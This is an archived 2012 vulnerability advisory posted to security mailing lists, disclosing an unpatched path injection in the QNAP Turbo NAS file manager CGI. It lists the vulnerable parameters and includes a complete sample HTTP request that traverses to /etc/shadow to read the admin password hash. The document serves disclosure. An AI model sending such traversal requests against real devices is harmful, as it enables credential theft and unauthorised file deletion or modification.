| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 4 Sep 2012 09:52:08 +0200 From: Andrea Fabrizi <andrea.fabrizi@...il.com> To: websecurity@...appsec.org, bugtraq@...urityfocus.com, webappsec@...urityfocus.com, full-disclosure@...ts.grok.org.uk Subject: QNAP Turbo NAS Multiple Path Injection ************************************************************** Vulnerability: Multiple Path Injection Product: QNAP Turbo NAS Vendor: QNAP Version affected: <= 3.7.3 build 20120801 Status: Unpatched Website: http://web.qnap.com/pro_detail_feature.asp?p_id=202 Discovered by: Andrea Fabrizi Email: andrea.fabrizi@...il.com Web: http://www.andreafabrizi.it ************************************************************** This vulnerability has been discovered on QNAP TS-1279U-RP, but probably other products that use the same firmware may be affected. The CGI "/cgi-bin/filemanager/utilRequest.cgi" is prone to a path injection, which makes it possible, for authenticated users, to access, delete o modify any file, included system files, configuration files and files owned by other users. Due to the single user configuration of the embedded linux system, it is possible to access any system file without restrictions (included /etc/shadow, that contains the hash of the administrator password). Vulnerable parameters are (the list is not exhaustive): /cgi-bin/filemanager/utilRequest.cgi [source_file] /cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name] /cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path] /cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path] /cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name] Sample HTTP request: ########################################################### POST /cgi-bin/filemanager/utilRequest.cgi/test.txt HTTP/1.1 Host: 192.168.0.10 Content-Type: application/x-www-form-urlencoded Content-Length: 123 isfolder=0&func=download&sid=12345abc&source_total=1&source_path=/myFiles&source_file=../../../etc/shadow ########################################################### _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists